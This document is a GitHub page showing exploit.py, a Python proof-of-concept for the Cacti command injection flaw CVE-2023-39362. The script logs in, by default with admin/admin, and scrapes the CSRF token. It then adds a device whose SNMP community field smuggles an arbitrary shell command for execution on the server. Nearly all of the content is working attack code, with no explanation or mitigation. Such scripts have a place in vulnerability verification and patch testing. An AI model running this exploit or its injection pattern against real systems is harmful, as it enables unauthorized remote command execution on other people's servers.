-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
113 lines (94 loc) · 3.84 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
from bs4 import BeautifulSoup
import requests
import argparse
import time
# Headers for POST requests
headers_post = {
"Accept": "text/html",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
}
# Function to perform login and get Cacti cookie
def perform_login(url, username, password):
# Load the site
response = requests.get(url + "/cacti/index.php", allow_redirects=True)
# Extract CSRF token from the response
csrf_token = extract_csrf_token(response.text)
# Extract cookies from the response
cookies = response.cookies
# Send a POST request with credentials
payload = {
"__csrf_magic": csrf_token,
"action": "login",
"login_username": username,
"login_password": password
}
response = requests.post(url + "/cacti/index.php", headers=headers_post, cookies=cookies, data=payload, allow_redirects=True)
if 'Access Denied!' not in response.text and response.status_code == 200:
return cookies
else:
pass
def add_new_device(url, cookies, cmd):
print("[+] Adding a new device with command injection payload")
# Extract csrfMagicToken from the response
csrf_magic_token = get_csrf_magic_token(url, cookies)
post_data = {
"__csrf_magic": csrf_magic_token,
"description": "DEVICE",
"hostname": "HOSTNAME",
"host_template_id": "9",
"snmp_version": "2",
"snmp_community": f"public\\' ; {cmd} ; \\'",
"snmp_security_level": "authPriv",
"snmp_auth_protocol": "MD5",
"snmp_priv_protocol": "DES",
"snmp_port": "161",
"snmp_timeout": "500",
"max_oids": "10",
"bulk_walk_size": "-1",
"availability_method": "2",
"ping_method": "1",
"ping_port": "23",
"ping_timeout": "400",
"id": "0",
"save_component_host": "1",
"action": "save"
}
print("[+] Sending POST request with command injection payload to add a new device.")
response = requests.post(f"{url}/cacti/host.php?header=false", headers=headers_post, cookies=cookies, data=post_data, allow_redirects=True)
if response.ok:
print("[+] Command injection successful.")
else:
print("[-] Something went wrong. Command injection is unsuccessful.")
# Function to get the csrfMagicToken from the response
def get_csrf_magic_token(url, cookies):
print("[+] Extracting csrfMagicToken...")
response = requests.get(f"{url}/cacti/host.php?action=edit&create=true", cookies=cookies, allow_redirects=True)
csrf_token = extract_csrf_token(response.text)
if csrf_token:
print('[+] The csrfMagicToken obtained.')
return csrf_token
else:
print('[-] Can\'t extract csrfMagicToken. Exiting...')
exit(0)
# Function to extract CSRF token
def extract_csrf_token(response_text):
soup = BeautifulSoup(response_text, 'html.parser')
csrf_token = soup.find('input', {'name': '__csrf_magic'}).get('value')
return csrf_token
if __name__ == "__main__":
# Command-line argument parsing
parser = argparse.ArgumentParser(description="Cacti Command Injection vulnerability (CVE-2023-39362) PoC exploit script")
parser.add_argument("--url", required=True, help="Cacti host URL")
parser.add_argument("-u", "--username", default="admin", help="Username (default: admin)")
parser.add_argument("-p", "--password", default="admin", help="Password (default: admin)")
parser.add_argument("--cmd", default="", help="Command to execute")
# Parse command-line arguments
args = parser.parse_args()
# Perform login
cookies = perform_login(args.url, args.username, args.password)
if cookies:
print('[+] Login is successful.')
add_new_device(args.url, cookies, args.cmd)
else:
print('[-] Login failed. Check your credentials.')
exit(0)